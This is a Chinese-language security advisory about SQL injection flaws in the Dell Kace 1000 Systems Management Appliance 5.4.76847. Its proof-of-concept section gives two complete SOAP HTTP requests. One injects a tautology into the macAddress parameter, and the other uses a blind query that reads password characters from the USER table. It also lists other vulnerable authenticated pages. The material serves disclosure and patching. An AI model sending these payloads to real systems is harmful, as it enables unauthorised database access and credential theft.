Dell Kace 1000 Systems Management Appliance多个SQL注入漏洞

发布日期：2014-01-13
更新日期：2014-01-22

受影响系统：
Dell Kace 1000 Systems Management Appliance 5.4.76847
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65029

Dell Kace 1000 Systems Management Appliance是系统管理设备。

Dell Kace 1000 Systems Management Appliance 5.4.76847及其他版本没有正确过滤getUploadPath及getKBot SOAP方法的"macAddress"参数值，可导致注入任意SQL代码，从而操作SQL查询。

<*来源：Rohan Stelling
        Bart Borkowski
        Alex Manusu
 
  链接：
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Proof of Concept
Page: /service/kbot_service.php
Web method: getUploadPath
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host:
SOAPAction: "urn:#getUploadPath"
Content-Length: 543

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
  <soapenv:Header/>
  <soapenv:Body>
      <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
        <macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
        <filename xsi:type="xsd:string">test</filename>
      </urn:getUploadPath>
  </soapenv:Body>
</soapenv:Envelope>
Page: /service/kbot_service.php
Web method: getKBot
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host:
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:#getKBot"
Content-Length: 553

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
  <soapenv:Header/>
  <soapenv:Body>
      <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
        <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
      </urn:getKBotConfig>
  </soapenv:Body>
</soapenv:Envelope>
The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
Page: /userui/advisory_detail.php
PoC: ?ID=9-2
Notes: Requires Authentication
Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
Parameter: ORDER[]
Notes: Requires Authentication
Page: /userui/ticket.php?ID=86
Parameter: ID
Notes: Requires Authentication

建议：
--------------------------------------------------------------------------------
厂商补丁：

Dell
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：